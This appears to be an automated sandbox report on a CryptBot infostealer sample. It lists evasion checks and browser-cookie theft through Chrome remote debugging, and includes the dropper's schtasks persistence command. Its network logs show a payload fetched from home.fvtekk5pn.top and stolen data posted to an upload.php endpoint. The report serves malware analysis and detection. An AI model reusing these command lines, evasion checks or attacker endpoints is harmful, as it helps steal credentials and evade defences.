cryptbot | 6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Uses browser remote debugging 2 TTPs 4 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
4480	chrome.exe
2440	chrome.exe
4084	chrome.exe
684	chrome.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Executes dropped EXE 3 IoCs

pid	Process
4644	service123.exe
4388	service123.exe
2032	service123.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Loads dropped DLL 3 IoCs

pid	Process
4644	service123.exe
4388	service123.exe
2032	service123.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4188	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4988	4188	WerFault.exe	86

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service123.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2632	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4188	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
4188	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
4480	chrome.exe
4480	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4188 wrote to memory of 4480	4188	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe	99
PID 4188 wrote to memory of 4480	4188	6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe	99
PID 4480 wrote to memory of 3984	4480	chrome.exe	100
PID 4480 wrote to memory of 3984	4480	chrome.exe	100
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 2940	4480	chrome.exe	101
PID 4480 wrote to memory of 1096	4480	chrome.exe	102
PID 4480 wrote to memory of 1096	4480	chrome.exe	102
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103
PID 4480 wrote to memory of 380	4480	chrome.exe	103

C:\Users\Admin\AppData\Local\Temp\6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
"C:\Users\Admin\AppData\Local\Temp\6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7fff2b49cc40,0x7fff2b49cc4c,0x7fff2b49cc58
    3⤵
    PID:3984
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2156,i,16807077969482628414,886987458851746237,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2152 /prefetch:2
    3⤵
    PID:2940
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1860,i,16807077969482628414,886987458851746237,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2484 /prefetch:3
    3⤵
    PID:1096
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2076,i,16807077969482628414,886987458851746237,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2588 /prefetch:8
    3⤵
    PID:380
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,16807077969482628414,886987458851746237,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4084
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,16807077969482628414,886987458851746237,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2440
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,16807077969482628414,886987458851746237,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4080 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:684
- C:\Users\Admin\AppData\Local\Temp\service123.exe
  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4644
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2632
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 1764
  2⤵
  - Program crash
  PID:4988

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4188 -ip 4188
1⤵
PID:3656

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4388

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2032

Network

DNS

home.fvtekk5pn.top

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

8.8.8.8:53

Request

home.fvtekk5pn.top

IN A

Response

home.fvtekk5pn.top

IN A

34.116.198.130
DNS

home.fvtekk5pn.top

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

8.8.8.8:53

Request

home.fvtekk5pn.top

IN AAAA

Response
GET

http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

34.116.198.130:80

Request

GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1
Host: home.fvtekk5pn.top
Accept: */*

Response

HTTP/1.1 200 OK

server: nginx/1.22.1
date: Fri, 22 Nov 2024 02:36:48 GMT
content-type: application/octet-stream
content-length: 10815536
content-disposition: attachment; filename="36EpLiutqfXtaXMkXOTru;"
last-modified: Tue, 19 Nov 2024 12:29:07 GMT
cache-control: no-cache
etag: "1732019347.4431374-10815536-3919321515"
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

130.198.116.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

130.198.116.34.in-addr.arpa

IN PTR

Response

130.198.116.34.in-addr.arpa

IN PTR

13019811634bcgoogleusercontentcom
DNS

76.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

fvtekk5pn.top

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN A

Response
DNS

fvtekk5pn.top

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN AAAA

Response

fvtekk5pn.top

IN A

34.116.198.130
POST

http://fvtekk5pn.top/v1/upload.php

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

34.116.198.130:80

Request

POST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 464
Content-Type: multipart/form-data; boundary=------------------------WvgeykcliJGaLe9SzUZpzI

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Fri, 22 Nov 2024 02:37:01 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
DNS

fvtekk5pn.top

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN A

Response

fvtekk5pn.top

IN A

34.116.198.130
DNS

fvtekk5pn.top

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN AAAA

Response
POST

http://fvtekk5pn.top/v1/upload.php

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

34.116.198.130:80

Request

POST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 73218
Content-Type: multipart/form-data; boundary=------------------------5C5qF0rA1xcDrUesrSnzB0

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Fri, 22 Nov 2024 02:37:03 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.16.228
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

172.217.16.228:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 429

date: Fri, 22 Nov 2024 02:37:05 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate
content-type: text/html
server: HTTP server (unknown)
content-length: 3153
content-type: text/html
content-length: 3153
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

172.217.16.228:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

172.217.16.228:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CPiSywE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGNHc_7kGIjCOsoYZc8-Z4C2FWsLa211eukZqfve79j0aSElpvknhCOq3Xx1IuRc9piF96PxL4aoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

172.217.16.228:443

Request

GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGNHc_7kGIjCOsoYZc8-Z4C2FWsLa211eukZqfve79j0aSElpvknhCOq3Xx1IuRc9piF96PxL4aoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGNHc_7kGIjA-CbuU73iBiscy5CGBLA9qalhYjNtNoQ2BSso4R1TeXB8jGFedLWFQUImr1pnXORQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

172.217.16.228:443

Request

GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGNHc_7kGIjA-CbuU73iBiscy5CGBLA9qalhYjNtNoQ2BSso4R1TeXB8jGFedLWFQUImr1pnXORQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

42.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.169.217.172.in-addr.arpa

IN PTR

Response

42.169.217.172.in-addr.arpa

IN PTR

lhr48s08-in-f101e100net
DNS

35.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.200.250.142.in-addr.arpa

IN PTR

Response

35.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f31e100net
DNS

228.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.16.217.172.in-addr.arpa

IN PTR

Response

228.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f41e100net

228.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f4�H
DNS

fvtekk5pn.top

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN A

Response

fvtekk5pn.top

IN A

34.116.198.130
DNS

fvtekk5pn.top

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

8.8.8.8:53

Request

fvtekk5pn.top

IN AAAA

Response
POST

http://fvtekk5pn.top/v1/upload.php

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

Remote address:

34.116.198.130:80

Request

POST /v1/upload.php HTTP/1.1
Host: fvtekk5pn.top
Accept: */*
Content-Length: 37928
Content-Type: multipart/form-data; boundary=------------------------zqz9BKSw5dJoFH9p6S7MAg

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Fri, 22 Nov 2024 02:37:09 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

241.42.69.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.42.69.40.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

97.164.16.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.164.16.2.in-addr.arpa

IN PTR

Response

97.164.16.2.in-addr.arpa

IN PTR

a2-16-164-97deploystaticakamaitechnologiescom
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response

34.116.198.130:80

http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347

http

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

201.2kB
11.1MB
4276
7975

HTTP Request

GET http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347

HTTP Response

200
34.116.198.130:80

http://fvtekk5pn.top/v1/upload.php

http

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

873 B
362 B
5
4

HTTP Request

POST http://fvtekk5pn.top/v1/upload.php

HTTP Response

200
34.116.198.130:80

http://fvtekk5pn.top/v1/upload.php

http

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

75.8kB
602 B
59
10

HTTP Request

POST http://fvtekk5pn.top/v1/upload.php

HTTP Response

200
172.217.16.228:443

https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGNHc_7kGIjA-CbuU73iBiscy5CGBLA9qalhYjNtNoQ2BSso4R1TeXB8jGFedLWFQUImr1pnXORQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

tls, http2

chrome.exe

3.0kB
16.7kB
29
29

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_promos

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGNHc_7kGIjCOsoYZc8-Z4C2FWsLa211eukZqfve79j0aSElpvknhCOq3Xx1IuRc9piF96PxL4aoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

HTTP Response

429

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGNHc_7kGIjA-CbuU73iBiscy5CGBLA9qalhYjNtNoQ2BSso4R1TeXB8jGFedLWFQUImr1pnXORQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
127.0.0.1:9222

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
127.0.0.1:9222

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
34.116.198.130:80

http://fvtekk5pn.top/v1/upload.php

http

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

39.5kB
562 B
33
9

HTTP Request

POST http://fvtekk5pn.top/v1/upload.php

HTTP Response

200

8.8.8.8:53

home.fvtekk5pn.top

dns

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

174 B
226 B
2
2

DNS Request

home.fvtekk5pn.top

DNS Request

home.fvtekk5pn.top

DNS Response

34.116.198.130
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

130.198.116.34.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

130.198.116.34.in-addr.arpa
